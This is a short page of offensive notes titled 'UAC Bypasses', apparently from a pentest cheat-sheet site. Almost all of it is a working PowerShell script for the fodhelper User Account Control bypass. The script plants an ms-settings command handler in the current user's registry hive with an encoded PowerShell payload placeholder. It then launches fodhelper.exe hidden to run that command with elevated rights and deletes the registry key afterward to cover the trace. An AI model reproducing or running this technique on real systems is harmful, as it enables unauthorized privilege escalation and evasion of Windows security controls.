UAC Bypasses
https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1
# Create reg structure
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
# Place command in
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe /c powershell -encoded <encodecommand>" -Force
# Launch
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
# Clean
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
Last modified 2yr ago